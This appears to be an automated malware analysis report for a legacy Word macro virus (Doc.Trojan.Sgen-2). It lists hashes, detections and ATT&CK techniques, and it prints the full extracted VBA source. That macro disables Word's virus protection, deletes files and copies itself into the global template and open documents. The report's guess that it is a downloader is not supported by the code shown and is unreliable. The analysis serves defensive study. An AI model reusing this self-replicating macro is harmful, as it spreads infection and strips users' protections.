Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7dada6332a87cb3d…

MALICIOUS

Office (OLE)

44.5 KB Created: 1999-06-11 18:20:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 917a80a10f46d2743b58160ecbe19b96 SHA-1: 635a99f7843e8ba7662a9f68234a20618c1c9fe0 SHA-256: 7dada6332a87cb3d871e7b9285d7ed1d446a34eccf8699019564a45cfbe33c6e
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1070.004 File Deletion

The sample contains a legacy WordBasic macro with an AutoClose subroutine. This macro attempts to delete files with the .sgn extension in the Windows directory and export VBA components to the same directory as 'nt.sgn' and 'ad.sgn'. It also writes a value to the registry under HKEY_CURRENT_USER\sGen, indicating an attempt to establish persistence. The presence of legacy macro markers and the specific actions suggest a downloader or persistence mechanism.

Heuristics 5

  • ClamAV: Doc.Trojan.Sgen-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Sgen-2
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 860 bytes
SHA-256: d2cb52f8358e0288cd201c6d90554e18936f9224144f9aa7c7ad3a811226c881
Detection
ClamAV: Doc.Trojan.Sgen-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "sGen"
Sub AutoClose()
On Error Resume Next
Options.VirusProtection = 0
Kill ("c:\windows\*.sgn")
NormalTemplate.VBProject.VBComponents.Item("sGen").Export ("c:\windows\nt.sgn")
ActiveDocument.VBProject.VBComponents.Item("sGen").Export ("c:\windows\ad.sgn")
If Dir("c:\windows\ad.sgn") = "" Then ActiveDocument.VBProject.VBComponents.Import "c:\windows\nt.sgn"
If Dir("c:\windows\nt.sgn") = "" Then NormalTemplate.VBProject.VBComponents.Import "c:\windows\ad.sgn"
System.PrivateProfileString("", "HKEY_CURRENT_USER\", "sGen") = "f0re's Macro Contest Contribution !"
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.